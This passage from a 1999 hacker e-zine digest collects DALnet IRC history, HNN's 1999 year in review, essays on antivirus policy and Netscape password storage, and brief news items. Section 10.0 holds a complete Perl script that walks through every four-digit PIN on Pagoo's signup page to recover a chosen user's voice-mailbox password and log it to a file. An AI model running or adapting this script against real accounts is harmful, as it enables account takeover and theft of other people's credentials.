information that was both up to date and reliable.
IRC has also been used during the Los Angeles Riots, the bombings in
Israel,the Presidential Elections in the United States, and of course,
Monica Lewinsky's deposition. Logs of these chats are available if you
click here. The DALnet IRC Network believes strongly in free speech
and freedom unless United States Federal Law or worldwide law is broken.
As will be stated below, IRC is supported by individuals who gain no
profit from their support of IRC (ISPs excepted).Therefore, many IRC
networks including DALnet do not allow the trading of illegal software or
'warez' or the so called 'kiddy-porn.'
At this time DALnet has about 40,000 users and forty-two servers
worldwide. It is important to remember that Internet Relay Chat is free
and is supported not by a conglomerate company but by a small group of
generous ISPs (Internet Service Providers), Admins (Server
Administrators) and IRCops (IRC Operators). None of these people are paid
for their support and generously provide a safe environment for you, the
user.
2. Information on DALnet
The DALnet IRC Network was created as a replacement for the troubled EFnet
(Eris Free Net) and Undernet IRC Networks. EFnet has over ffity-thousand
users and eight thousand active channels. This is the largest of the IRC
Networks but it does have many troubling downsides. EFnet is also
one of the slowest networks. There is usually tremendous lag time because
of overwhelming users, bad server routing and connections and also
hacking. EFnet has hundreds of servers but has frequent NetSplits and thus
needed to be replaced by something more efficient. From this the Undernet
was born.
Undernet, though smaller, has servers in the United States, Canada,
Australia and in Europe. The Undernet attempted to do away with the high
consumption of bandwidth and channel chaos that was created by a large
number of users running bots (programs that perform a certain task).
These bots were usually intended to protect channels from takeovers or
were used to takeover channels themselves. The Undernet offered the
CService-a program that allowed users with W or X type bots to register
channels and protect them from troublemakers. The Undernet hit major
stumbling blocks in the areas of customer services and care, but the one
area of service that the Undernet excelled at was in innovations. The
Undernet allowed for new commands to be installed in the IRCd and new
channel modes to be used. It also allowed for greater security for
channels and channel modes aswell as users.
The summer of the year 1994 dawned a new age for the users of Internet
Relay Chat. During this time the DALnet IRC Network was formed using a
modified version of the Undernet IRCd. This IRCd was edited cheifly by
Alexei "Lefler" Kosut. Some of the innovations included: global
WallOps (IRCop messages that can be seen by users who are +w (/mode
NickName +w)), longer nicknames, Q:Lined nicknames (nicknames that cannot
be used i.e. ChanServ, IRCop, NickServ, etc.), global K:Lines (ban of one
person or an entire domain from a server or the entire network), IRCop
only communications: GlobOps, +H mode showing that an IRCop is a HelpOp
also and many, many, many more features. DALnet's unique services were
originally coded in early 1995 by Brian "Morpher" Smith and allow users to
own nicknames, channels, send memos and do much, much more. These services
are superior to the X and W bots because they are omnipotent and invisably
reside in every channel. Because of this channel bots are not needed.
ChanServ's automatic channel registration eliminates the lengthy processes
of Undernet while still being extremely easy to use and also very secure.
DALnet also provides users with the ability to 'own' one's NickName. The
/nickserv register PASSWORD command is all that is needed to own your own
nickname an ensure that it is always there for you when you come online
Note: PASSWORD is your own password that you MUST remember or write
down for future use). DALnet users can also send Post-It type 'memos' to
eachother if both user's nicknames are registered. More info on services
is available on their pages.
Many servers have linked to and parted from DALnet in the few years that
it has existed. Some have left due to bandwidth problems, Internet Service
Provider problems, interpersonal problems, and other reasons.
3. Looking to the future
DALnet continues to grow. It's user count has rocketed from around 30,000
at the beginning of 1999 to 45,000 during the Summer. DALnet's extensive
and well developed help system, whereby a person has a large number of
'recommended' channels and other resources at their fingertips,
continues to go from strength to strength. Among the current innovations
are freshly coded services which allow users to gain full potential from
nickname and channel registration and the new IRCd
(http://www.bahamut.net) to ensure a quick, worry-free connection.
DALnet's staff are still the pride of the network; users can join
#OperHelp for speedy assistance from an IRCop, and you'll always be
assured of a smiling, helping hand when you
need it.
Some information contributed by: nelgin, Sentinele, dalvenjah,
WebMaster, blofeld and the_saviour.
@HWA
10.0 Pagoo Internet voice MailBox by Loophole/HHP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Source: Loophole
#!/usr/bin/perl
#
# (hhp) hhp-pagoo.pl (hhp)
# by: LoopHole of the hhp.
# http://hhp.hemp.net/
# 6/25/99
#
# The (Pagoo Internet voice MailBox) exploit.
# Available at http://www.pagoo.com/
#
# This exploit will extract the password to
# the specified PagooID you specify.
#
# The vulnerability comes into play when you
# connect to your UpdateForm thru signup.asp
# which requires your PagooID and your 4
# digit password.
#
# Nothing will prevent you from reconnecting
# and trying a new password from 0000 in
# increments of 1 till we reach 9999 which
# is the highest password possible... I
# could call this a brute, but it always
# 100% of the time will get the passwd
# unlike a brute.
#
# Logs passwds to file: pagooids
use IO::Socket;
die "usage: $0 <PagooID>\n" unless(@ARGV == 1);
($box) = (@ARGV);
open OUT, ">>pagooids" or die "Can't open temp file -> .pagoo\n";
autoflush OUT 1;
$host = "www.pagoo.com";
autoflush STDOUT 1;
sub parse
{
($num) = @_;
$url = "/asp/signup/signup.asp?Service=UpdateForm&PagooID=$box&Password=$num";
$socket = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => 80,
Proto => "tcp") or die "Can't connect.\n";
print $socket "GET $url\n";
print "Trying password: $num of 9999.\n";
while(<$socket>)
{
chomp;
if(/Password invalid/)
{
break;
}
if(/First Name/)
{
print "PagooID password extracted...\n";
print "PagooID: $box / Password: $num\n";
print OUT "PagooID: $box / Password: $num\n";
exit 0;
}
}
}
$num = '0000';
parse $num;
for($i = 0; $i <= 9999; $i++)
{
$num++;
parse $num;
}
@HWA
11.0 HNN: The Year in Review 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Note: Check the url for relative links included in the text. - Ed
Page 1
Nineteen Ninety Nine was an exciting year that saw
explosive growth for HNN and our ever continuing battle
against Fear, Uncertainty, and Doubt (FUD). While some
of our engagements with FUD have been successful, like
the alleged moving of a British satellite, other battles like
the numerous virus scares, were not. 1999 also saw some
major events unfold in the underground community, from
the exposure of Se7en as a fraud, to the removal and
resurrection of Packet Storm Security, and the debacle of
MTV. At the close of the year Kevin Mitnick is awaiting
release while others take his place behind bars.
Throughout 1999 HNN was the place on the net to get up
to date breaking news on these stories.
These top eleven stories of 1999 are not presented in any
particular order.
LoU China-Iraq War
On December 29, 1998 the underground group Legions of
the Underground declared an all out cyber warfare on
information infrastructure of China and Iraq. They cited
severe civil rights abuses by the governments of both
countries as well as the sentencing to death of two bank
robbers in China and the production of weapons of mass
destruction by Iraq as the reasons for their declaration.
By January 5th, 1999 a group known as spl0it and a group
based in Poland said that would assist LoU in their cyber
warfare efforts.
On January 6th, 1999 Legions of the Underground released
a statement contradicting their earlier statements that
claimed that they never had destructive intentions and
blame the media for letting this get out of hand.
The retraction by LoU came to late. On the next day
January 7th, 1999 an International Hacker Coalition
including groups such as cDc, L0pht, CCC, 2600, Phrack,
!HISPAHACK and others released a joint statement
condemning the Legions of the Underground and their
Declaration of War.
By January 8, 1999 LoU was reeling from the overwhelming
support of the joint condemnation of LoU's actions and
released additional retractions of their declaration of war.
On January 13, 1999 the Legions of the Underground told
Wired magazine that the original press conference was a
fake and that the people present during the press
conference were spoofed. There is no evidence to support
this but there is none to deny it either.
Finally Optiklenz, a member of LoU, releases a statement
on the view of what happened from the LoU perspective.
LoU-China-Iraq War Histogram - Chronological Listing of
Events
HNN Archive for December 29, 1998
Transcript of IRC Press Conference with LoU
LoU Declaration of War
HNN Archive for January 6, 1999
International Hacker Coalition Joint Statement
LoU Retraction of War Declaration
Optiklenz Statement
Hackers Move British Military Satellite
This is one battle with FUD that we like to claim that we
won. On March 1, 1999 The Sunday Business published a
story that was later picked up by the Reuters wire
service, that a British military satellite had been taken
over by cyber attackers and was being held for ransom.
The story itself lacked any sort of verifiable information
and HNN called it into question immediately. By the next
day spokes people from the British Ministry of Defense flat
out denied that such a thing was even possible. HNN
editor Space Rogue was a guest on the radio show "Off
the Hook" to discuss this incident. Both ZDNet and MSNBC
ran stories covering this non event crediting HNN for
calling the story suspect. Bob Sullivan of MSNBC went so
far as to label HNN "The Voice of Reason".
HNN Archive for March 01, 1999
HNN Archive for March 02, 1999
Original Sunday Business Article
Security Analysis of Satellite Command and Control Uplinks
- Buffer Overflow Article by Brian Oblivion
MSNBC
ZD Net
Off The Hook - March 02, 1999 episode
Se7en Exposed
An article written by Steve Silberman and published by
Wired exposed Se7en (Christian Valor) and his single
handed cracker crusade against pedophiles as a complete
sham. Se7en succeed in creating a massive media hack as
articles of his infamous exploits were published in Forbes,
MSNBC, LA Times, Newsday and others over several
months. Only one of the journalists that we know, Adam
Penenberg, that had been duped by Se7en actually
admitted his mistake and published a public apology.
HNN Archive for February 8, 1999
Attrition.org - Evidence used against Se7en
Wired
Open letter from Adam Penenberg
HNN: The Year in Review
Page 2
John Vranesevich Shuts Down Packet Storm Security
Probably the biggest story of 1999 was the actions of
John Vranesevich, founder and administrator of AntiOnline,
who was instrumental in getting the extremely popular
web site Packet Storm Security shut down.
As far as can be determined John Vranesevich discovered
a private directory on Packet Storm that contained
potentially libelous material about him and his family. Mr.
Vranesevich did not contact the site administrator directly
but instead sent an email to the administrators at Harvard
University asking that the objectionable material be
removed. Harvard responded by unceremoniously pulling
the plug on the whole site.
Once word of how and why Packet Storm had gone down
a public outcry ensued. Mailing lists where started, people
started an attempt to mirror the site, Ken Williams
received numerous offer to host the site and Mr.
Vranesevich became the whipping boy du jour.
Because Mr. Williams was unable to access his web site,
which was his senior project, he was forced to drop out of
school. He later sold the web site to Kroll O' Gara and took
a position at a major internet security company.
HNN Archive for July 1, 1999
HNN Archive for July 2, 1999
Attrition.org - Examples of the supposedly libelous
materials posted to Packet Storm
Ken Williams Statement
AntiOnline - John Vranesevich's Defense
Letter from Harvard
Ken Williams Response to Harvard
Letter From Bronc Buster - Regarding the actions of Mr.
Vranesevich
ZD Net
HNN Pulls Massive April Fools Joke
It was meant as a simple joke, a simple April Fools Day
prank, a reason to smile or to laugh. It turned into one of
the biggest stories in the underground for 1999. At
midnight EST on April 1, 1999 the main Hacker News web
page was updated with what appeared as a web
defacement. The page contained all the required elements
of a defacement, poor spelling, hax0r speak, shout outs,
etc... Many, many, bought the defacement hook line and
sinker, HNN administrators even got personal phone calls
to their homes at 8am to inform them of the defacement.
Remember, even as recently as April web defacements
were a relatively rare thing, not occurring by the dozens
like they are today. Ahhhh, but the fun did not stop there.
At Noon EST the HNN pranksters felt the unsuspecting
public needed even more mayhem and hi jinx. The defaced
page came down and the days news went up. The news
contained stories such as Kevin Mitnick breaking out of jail
by whistling a 300 baud carrier into a phone, L0pht Heavy
Industries selling L0phtCrack for $1.2 billion to NAI, CERT
going out of Business, and Microsoft buying Network
Solutions for complete control of the Internet. Considering
the volume of mail we received regarding these stories
(some of which came from mainstream journalists) many
many people believed them.
Archive of HNN Defacement
HNN Archive for April 1, 1999
PhoneMasters
For some reason the mainstream media has really not paid
attention to this story. Considering the level to which
these crimes escalated and the methods and effort
needed to catch the these crooks it is a wonder that
there wasn't more media coverage.
The FBI called them the 'Phone Masters' and labeled their
crimes as one of the greatest cyber-intrusions of all time.
Court records show that the Phone Masters had gained
access to telephone networks of companies including
AT&T Corp., British Telecommunications Inc., GTE Corp.,
MCI WorldCom (then MCI Communications Corp.),
Southwestern Bell, and Sprint Corp. They broke into
credit-reporting databases belonging to Equifax Inc. and
TRW Inc. They entered Nexis/Lexis databases and
systems of Dun & Bradstreet. They could eavesdrop on
phone calls, compromise secure databases, redirect
communications, they also had access to portions of the
national power grid, and air-traffic-control systems.
The FBI had to invent special equipment they called a
'data tap' specifically for this case and get special
permission from DOJ to use it. It took several years of
listening to phone calls to gather enough evidence for an
arrest but on February 22, 1995 the FBI conducted a raid
on three suspected members of the PhoneMasters. Other
members of the group are thought to remain at large.
Three members of the group pleaded guilty to federal
charges of one count of theft and possession of
unauthorized calling-card numbers and one count of
unauthorized access to computer systems. The three
where sentenced in October for 24 to 41 months in federal
prison.
What bothers us most about this story is that almost no
mainstream media has reported on the story. The first
mention we can find about the Phone Masters is from a
local TV stations, WFAA in Dallas FortWorth back in the
beginning of May.
Phone Master Hacks - Buffer Overflow Article
HNN Archive October 4, 1999 - PhoneMasters Plead Guilty
Wall Street Journal - one of the few articles about this
case
Union Tribune - Another rare article that has a little bit
more info.
CNN - Tries to answer why the media missed the boat
Aviary Mag - Interview with An Acquaintance of the
Phone Masters
MTV
Serena Achtul host of MTV News and of a documentary
style program known as 'True Life' wanted to do a show
on 'hacking' and in particular a show about Kevin Mitnick.
She was placed into contact with Emmanuel Goldstein of
2600 Magazine who organized several interviews for her.
He spent a lot of time and effort in getting good people
for her to talk to and they shot several hours worth of
film.
For one reason or another the Kevin Mitnick aspect of the
show was cut out, so being a good sport Emmanuel
directed Serena to the folks at L0pht Heavy Industries.
The L0pht crew made time in their busy schedules to
spend an entire day with Serana and her film crew
explaining the finer points of what they do and explaining
the difference between script kiddie defacements and true
hacking.
Again for some reason, this angle for the show was not to
MTVs liking so they struck out on their own looking for
whatever it was they wanted. They found Shamrock, the
host of the Internet TV show devoted to hacking known
as Pseudo.
The result was a complete farce. Evidently Shamrock
decided to take MTV for a ride and give them what they
wanted, a story line straight out of the movie Hackers.
The show did nothing to explain what hacking was all
about and was far from a documentary. Needless to say
many people are upset at MTV and others over this mess.
Letters from HNN Viewers
Letter from Emmanuel Goldstein
Letter from Shamrock
HNN: The Year in Review
Page 3
Defcon VII and BO2K
Defcon probably had the most mainstream media coverage
of any hacker convention to date. With over 3000
attendees and over 200 press representatives present it
was definitely one of the biggest conventions ever. With
the release of Back Orifice 2000 from the Cult of Dead
Cow the press was working at a fever pitch trying to
cover the story even before the software was released.
HNN spent quite a few days inebriated in Las Vegas while
we tried to cover the happenings at Defcon. Some of the
highlights included the BO2K launch presentation,
complete with thumping techno and strobe lights, the
ejection of Carolyn Mienel from the conference floor, and
the defacement of the Defcon.org web page.
When we returned we had over 1200 emails to answer and
one pounding hang over. The media went nuts over the
BO2K release, sparking debates on just what a virus is and
what should be scanned. Network Associates claimed to
be the first out of the gate with a patch for the program.
Microsoft was even prompted to release a security
bulletin.
Also at Defcon, Zero Knowledge released 1000 beta copies
of Freedom, L0pht Heavy Industries introduced the
revolutionary new security tool AntiSniff, Bruce Schneier
announced that PPTPv2 'sucks less', and Security Wizards
released their Capture the Flag Logs.
HNN Archive for July 9, 1999 - Press frenzy prior to con
Defcon.org Defacement Mirror
HNN Archive for July 13, 1999 - the Aftermath
Defcon VII Review - Buffer Overflow Article
The Back Orifice 2000 Controversy - Buffer Overflow
Article
How the Anti Virus Industry Works - Buffer Overflow
Article
AntiVirus scanning for potentially misused tools is a
doomed security strategy. - Buffer Overflow Article
Kevin Mitnick
Kevin Mitnick's road has been a long and bumpy one that
has stretched for several years, 1999 was no different.
One small bright thing is that Kevin is scheduled to be
released, finally, sometime early in 2000.
In March the federal government succeeded in wearing
Kevin down. He decided to plead guilty in the hopes to get
his four year ordeal over with. Unfortunately he still had
charges from the State of California to deal with.
HNN Archive for March 29, 1999
On April 26th it was revealed that the companies
supposedly hurt by theft of software by Kevin Mitnick
never reported those millions of dollars in losses to the
SEC as required by law.
HNN Archive for April 25, 1999
Letters from companies estimating the amount of
damages.
June 4th was supposed to be the day in which Kevin was
officially sentenced and so demonstrations to support
Kevin were planned at federal courthouses across the
country. Unfortunately the hearing was postponed at the
last minute but the demonstrations continued. Folks in
other countries joined in by protesting outside embassies,
the New York demonstration hired a skywriter to write
FREE KEVIN over Central Park, the Philadelphia
demonstration made onto the local news and many online
news agencies covered the San Francisco Demonstration,
numerous other cities attempted to live web cast their
demonstrations.
HNN Archive for June 5, 1999
Press Release -Demonstration Announcement
Picture of the Russian Demonstration
On Kevin's fifth birthday behind bars the LA District
Attorney graciously decided to drop the state charges
against him. The DA claimed that the case had been
mischarged.
Finally on August 9th, after numerous delays, Kevin
received his sentence of 46 months in prison with credit
for time served. He will also be forced to pay $4125
restitution to the supposed victims in the case. Instead of
halfway house as expected he was remanded to Lompac
Federal Prison.
HNN Archive for August 9, 1999
Much more in depth information regarding Kevin Mitnick,
his current status and the historical significance of this
case can be found here.
FREE KEVIN
Virus Scares
1999 was a banner year for viruses. Melissa, CIH, and
numerous other viruses had the press working over time.
The virus writers keep churning them out, the antivirus
companies keep detecting them and the press was not far
behind.
Melissa seemed to be extremely virulent. By emailing 50
copies of itself after every infection it made it around the
globe very quickly. It managed to jump the air-gap onto
US governments SIPRNet and even made it on board ships
in the Seventh Fleet. Numerous variants of Melissa
surfaced with distributed DoS attack capability. Melissa
was somehow traced through usenet to AOL and finally to
David L. Smith who pleaded guilty to creating and
releasing the virus.
HNN Archive for March 31, 1999 - Melissa makes it to 7th
Fleet, Kills Marines Email, DoS Variant Appears
HNN Archive for April 2, 1999 - David Smith arrested and
released on $100,000 bail
HNN Archive for April 5, 1999 - Melissa jumps air-gap onto
classified SIPRNet
HNN Archive for December 12, 1999 - David Smith pleads
guilty.
CIH while not as prolific as Melissa was definitely more
destructive. CIH or Chernobyl is triggered to release its
payload on April 26th every year and it has been around
for a while. It hit exceeding hard this year especially in
the Far East. Its creator was traced back to Taiwan
where he said he was sorry.
HNN Archive for April 27, 1999 - CIH strikes worldwide
HNN Archive for April 29, 1999 - CIH Author Identified.
HNN Archive for May 12, 1999 - China Estimates 360,000
systems Damaged by CIH
The Virus Community Speaks
How the Anti Virus Industry Works - Buffer Overflow
Article
AntiVirus scanning for potentially misused tools is a
doomed security strategy. - Buffer Overflow Article
Ireland, Indonesia, China, Sweden, and Yugoslavia
Government sanctioned cyber attacks seem to be all the
rage these days. Some countries are openly announcing
their plans to create offensive cyber warriors while others
are claiming to have already suffered government
sanctioned cyber attacks.
In January a small ISP in Ireland, Connect Ireland, that
hosts the top level domain for East Timor claimed that it
had suffered a massive attack by Indonesian government
forces. Indonesia of course denied the charges.
HNN Archive for January 26, 1999
Newsweek claimed that President Clinton authorized a
"top-secret" plan against Slobodan Milosevic. One part of
this plan would use "computer hackers" to attack his
foreign bank accounts. Newsweek went on to say that
the report instructed the CIA to wage "cyberwar" against
Milosevic.
HNN Archive for May 24, 1999 HNN Archive for July 6,
1999
Yugoslavia Cut Off from the Net? - Buffer Overflow Article
Sweden announced the formation of a cyber defense
force.
HNN Archive for July 14, 1999
Nobel Peace Prize laureate Jose Ramos-Horta claimed that
hundreds of people around the world were poised to
launch a cyber attack against Indonesia should there be
any tampering in the election process for East Timor's
freedom. No evidence was given for this cyber arsenal
build up and no attack ever came. Connect Ireland, the
ISP supposedly targeted by Indonesian forces earlier in
the year asked that no internet attacks be launched.
HNN Archive for August 20, 1999
Connect Ireland - response to Indonesian threats
A Chinese military newspaper covering the activities of
China's Peoples Liberation Army has called for the
recruitment of 'civilian hackers' and for the training of
'cyber warriors' at Army schools.
HNN Archive for August 4, 1999
We hope that this disturbing trend does not continue into
the next year. It will be an extremely bad day when the
internet is legislated as a weapon of war.
@HWA
12.0 AntiVirus scanning for potentially misused tools is a
doomed security strategy.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
The Anti-Virus vendors seem to be taking on a larger
role. Not only are they scanning for true viruses and
trojan horses but any software that may potentially be
misused, as long as it is not their own software. This
activity does nothing to close the holes in your network
but instead gives you a false sense of security.
Buffer Overflow
http://www.hackernews.com/bufferoverflow/
AntiVirus scanning for
potentially misused tools is a
doomed security strategy.
By: Weld Pond, weld@l0pht.com
L0pht Heavy Industries
December 20, 1999
There is a growing trend with AntiVirus scanners today.
The scanners are scanning for more and more software
that does not contain virus or trojan code. The new
category of software the scanners are looking for is
common software that has the *potential* to be misused
by malicious persons. Usually this software is in the
security auditing tool, network monitoring, or remote
control category.
Corporate customers of AntiVirus software have requested
that these potentially misuseable programs be flagged
and, in some cases, "disinfected" by the scanning
software. The AntiVirus vendors seem more than happy to
comply. Even going so far as to label this new category of
detected software as a "virus" or "trojan" when found, no
matter how misleading to the user this label is.
Another controvertial twist in this new AntiVirus category
is the fact that the AntiVirus vendors do not scan for their
own tools that fall into the new "potentially misusable
program" categories. Symantec's Norton AntiVirus will scan
for the remote control programs, NetBus or BO2K, but not
the company's own PC Anywhere. Network Associates'
McAfee VirusScan will detect the NT password auditing
tool, L0phtCrack, but will not detect the company's own
vulnerability auditing tool, Cybercop scanner, or their
network sniffers, Sniffer Basic or Sniffer Pro.
It is a fallacy that commercial tools are not misued by
malicious individuals. They are usually available as free
trial downloads or available on pirate software sites.
However, the whole notion of protecting a network by
scanning for potentially misuseable tools is a fallacy unto
itself!
Using AntiVirus client scanning technology to find
programs that can exploit the security problems on a
network is a losing battle. AntiVirus software can be
turned off. New tools or new versions of older tools will
soon become available. Other machines without AntiVirus
software can be attached to the network. Machines can
be booted with alternative OSes.
You need to actually fix the network security problems! It
is foolhardy to scan for tools that could exploit problems
rather than just fixing the problems. This scanning
scenario just gets OS and application vendors off the
hook. Now they don't have to fix the problems. They will
just rely on the AV vendors to scan for programs or code
that can exploit the problems. Why fix, for example, Win
95/98 challenge-response network authentication? Each
client on the network should be scanning for all known
tools that can sniff the network or crack the passwords.
Obviously this is not a good security model.
Scanning for potentially misused tools is leading network
security down the path to the horrible situation we have
with mobile code sent through email or through the web.
The current industry accepted solution is not to solve the
problem with a proper security architecture for hostile mail
or web content. But instead just scan for all *known*
malicious mobile code. Ugh! The AntiVirus vendors have a
vested interest in the status quo but this is not bringing
the industry closer to a solution. To broaden this
approach to cover network security problems is clearly
heading in the wrong direction.
Can you imagine a day when a vendor responds to an
intranet security vulnerability by saying, "This is not a
problem with our product. We do, as always, recommend
that all customers keep their AV software updated." It is
time to start making networks or computers secure
without relying on the approach of client code scanning. A
false sense of security is worse than known poor security.
If your network security cannot survive well known tools
being installed and executed then you need to start
addressing your problems, not sweeping them under the
rug.
Weld Pond
weld@l0pht.com
@HWA
13.0 RST Sets the Record Straight
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by John
Last week Reliable Software Technologies, Inc.,
released a new advisory regarding the storage of email
passwords by Netscape. They took a lot of flak from
people, including HNN, who thought this was an old
problem being rehashed by RST for cheap publicity. RST
would like to take a moment to sort out the details and
explain their new advisory and the old problem.
Letter from RST
http://www.hackernews.com/special/1999/rst.html
Reliable Software Technologies
http://www.rstcorp.com
Date: 12/19/99 21:57
Received: 12/19/99 22:04
From: John Viega, John@list.org
To: contact@hackernews.com
Hey,
I believe that what HNN posted today about the Netscape
thing is largely inaccurate. First, there are and have been
two different ciphers in use in Netscape that are similar,
but slightly different. The simpler one, which is a base 64
and an xor only (with potentially a pad), apparently made
the rounds a year ago, and people did note that it looked
similar on recent versions of windows. But it isn't the same
right now. Maybe Netscape changed their cipher from last
year, or perhaps it has been the same through the whole
4.0 series. I dunno, but at some point they did change it.
I looked at the 2.0 series, the 3.0 series, and 4.6 + 4.7 on
Windows. The 4.6 and 4.7 cipher is substantially different
from the 2/3 cipher. The 2/3 cipher is the same as current
versions of Unix and Mac. Let's face it... user habits are
different on Windows than on Unix. Few if any people use
NS to read mail on a Mac. Plus, Windows has a lot more
dumb users.
So we have defintely broken a different cipher. We didn't
know that the older cipher was previously broken. When
we talked to Netscape, they gave us no indication that it
ever had been. In fact, they seemed to be indicating that
they were crossing their fingers hoping that no one would
target it. Also, the old attack wasn't very well publicized.
Again, I suspect that NS new about the old attack, was
glad it stayed low key, and quietly made the algorithm a
bit harder on its flagship Windows version without making
a real effort to fix the problem.
The new cipher still does a base 64 encode and an XOR
with a fixed key. However, it also does some bit
permutations, and reads the bytes in reverse order. If you
look at the same 7 char password encoded with the old
algorithm and the new algorithm, you will notice that they
aren't the same. You'll notice the "=" pad is at the front in
the new kind, and comes last in the old kind. The strings
will also look similar, but aren't the same thing reversed, or
anything like that.
It wasn't that much stronger, but they obviously hoped it
would provide a bit more security. Funny, the MSDN
developer's network talks about security, mentions that
XOR is desirable, and suggests tricks like this to help
improve the security of XOR. It's completely and utterly
rediculous.
So, to summarize so far, the cipher is exactly as complex
as we said it was, and not "simpler than first thought".
There's been some unfortunate confusion between their
old cipher and their new one. It definitely would have
been nice if we'd run across info on the old one before we
talked to Netscape, or if they'd have told us about it, but
those things did not happen.
The next point I'd like to contend in today's HNN article is
the quote "To Netscape's credit they are just conforming
to the POP3 protocal which sends passwords in the clear
anyway." First, the save password feature works w/ POP3
and IMAP. IMAP doesn't require you to send passwords in
plaintext. If I recall correctly, there are a bunch of
different authentication mechanisms. Of course, I don't
know what NS uses or does not use. Second, I don't
believe that just because a password is going to be sent
in plaintext, you should make it even easier for people to
get at it. Even if you can't raise the bar high enough that
someone won't be able to jump it, you should raise the bar
as high as you can. Why didn't Netscape just leave the
password lying around in plaintext? Well, even really poor
obfuscation is going to stop most computer illiterates from
getting the password. They'll find it if it's in plaintext
(though someone might have to tell them it's there). At
many companies, it'd be that much easier to get your
boss' mail password, etc. just because he left himself
logged in.
So basic obfuscation raises the bar a bit. But script
kiddies can download software to decrypt the old
passwords (we haven't seen anyone post such software
for the new algorithm yet). Also, it's not too hard to
embed code to collect such passwords in email
attachments that show dancing pigs. In some older
versions of Netscape, the password could be extracted
remotely via JavaScript. For people who run both IE and
Netscape, there is a current IE bug that will let people
extract the ciphertext Netscape uses (Thanks to Richard
Smith for that). More such holes might (probably) exist
elsewhere.
I think that the more difficult you make this, the better,
even if the password is sent over the network in plaintext.
Why? Because it raises the bar a bit more. I believe that
fewer people have the skills to set up a sniffer, and mine
the data it produces than can run code to email back
encrypted passwords, and then run code to decrypt them.
Plus, there are tools like antisniff that can make it harder
to sniff. Plus, you have to wait around for the person to
actually check his mailbox from that machine (which he or
she might not even use anymore). It's not a much bigger
bar, true, but I believe it's a bit bigger nonetheless.
I've heard people argue that it is pointless for Netscape to
use real encryption such as Twofish or 3DES and hide a
key, because the key could be obtained through reverse
engineering. Well, it's true that you could obtain the key
that way. Again, I think it is a matter of raising the bar as
high as you can. If you hide the key well, few people will
be willing to go through the hassle of reverse engineering
the code. Sure, it may eventually happen, but Netscape
should hope that "eventually" at least buys them a little
bit of time where they can really offer some security to
people saving their passwords. There have been plenty of
products that have gone several years with embedded
keys that no one bothered to reverse engineer (at least,
so far as the public knows). For most people, reverse
engineering can be a huge time sink, and may not be
worth the effort, especially when really good obfuscation
is performed. There's generally always more interesting,
lower hanging fruit to be picked. I know that I sure
wouldn't have bothered to reverse engineer Netscape's
algorithm if we couldn't break it by other means, and I
believe a lot of other people feel the same way.
Another sentiment I have heard a bit in the past couple of
days is, "If you need access to run code on the machine
for this exploit, who cares, since you've already
compromised the machine?" Well, the primary response to
this is that mail account info is often a quick gateway to
other accounts on other machines. POP3 and IMAP
accounts often check the same password file telnetd
checks. Or, wu-ftpd, which you could use in conjunction
w/ a recent buffer overflow to get a shell. Also, plenty of
people use the same passwords for multiple accounts, PGP
passphrases, whatever. They shouldn't, but they do
anyway.
John
@HWA
14.0 Russian Politician Threatens Cyber Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by EvilWench
Russian politician, Vladimir Zhirinovsky, has threatened
to electronically steal money from Western bank
accounts. When asked what he would do to celebrate if
he wins an upcoming parliamentary election the
maverick politician announced that he would unleash
computer viruses on the West and steal their money.
Reuters - via Excite
http://news.excite.com/news/r/991219/18/russia-election-zhirinovsky
Jubilant Zhirinovsky wants to hack Western computers
MOSCOW (Reuters) - Russia's maverick politician Vladimir Zhirinovsky,
whose ultra-nationalist bloc looks set to do well in a parliamentary
election, said Monday he would celebrate by hacking into Western computers.
Zhirinovsky's bloc was running at more than eight percent in early results
compared with pre-election opinion polls which had given him some five
percent.Asked by Reuters whether he would have a drink to mark his party's
good showing, he said:
"No. No way, we Russians don't drink any more. We now work on computers,
we use computers to send viruses to the West and then we poach your
money."
"We have the best hackers in the world. We do not need to drink or smoke...
we do not drink, smoke, have drugs and we don't have AIDS, that's what
you have got in the West."
Russia is a heavy drinking nation which is struggling to catch up with
economically-advanced countries on the use of new technologies, such as
the Internet, but a lack of resources and poor infrastructure confines
progress to big cities.
Zhirinovsky who has run and done reasonably well in all parliamentary and
presidential elections since 1991 on a protest vote by lower stratas of
the Russian society, is one of the most eccentric politicians with an acute
political sense and bizarre sense of humour.
He has thrown juice at an opponent in a live televised debate, promised to
wash his boots in the Indian Ocean when Russia expands there and been
involved in fist-fighting in the State Duma lower chamber of parliament.
But at the same time, he has decided crucial votes in parliament in the
Kremlin's favor and has developed a well organised party with solid assets.
@HWA
15.0 PCR-1000 Control Suite Released by Ghetto.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Javaman
After many hard hours of labor from Polywog and
Javaman, Ghetto.org proudly releases it's first
mainstream product, the PCR-1000 Control Suite. The
PCR-1000 is a wideband, PC-controlled receiver whose
only decent control software was Win 9x/NT based.
Because of Ghetto.org, there is now a *nix solution.
Currently the code only compiles under Linux, they are
seeking assistance in porting to other platforms.
Ghetto.org
http://www.ghetto.org
PCR-1000 Control Suite
http://www.ghetto.org/projects
@HWA
16.0 Nuclear Power Plant Y2K Readiness
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by ZapfDing
A little paranoid about Y2K and whether that nuke plant
down the street is ready? The Nuclear Regulatory
Commission has released an interesting PDF file that lists
the Y2K transition period for all the nuclear power plants
in the world in relation to EST and UTC.
Nuclear Regulatory Commission and Y2K
http://www.nrc.gov/NRC/NEWS/year2000.html
Global Y2K Plant Listing - PDF
http://www.nrc.gov/IP/Y2K/yewstz.pdf
@HWA
17.0 New E-zines Released
~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by 1k Resistor and sony_103
Digital Defiance has done it again and come out with
their second issue. They continue to run head strong
with articles on house arrest devices as well as their
feature of the month of HiCards free phone cards. The
Venezuelan magazine Hven ezine issue #2 has also been
released. Yes, it is in Spanish.
Digital Defiance
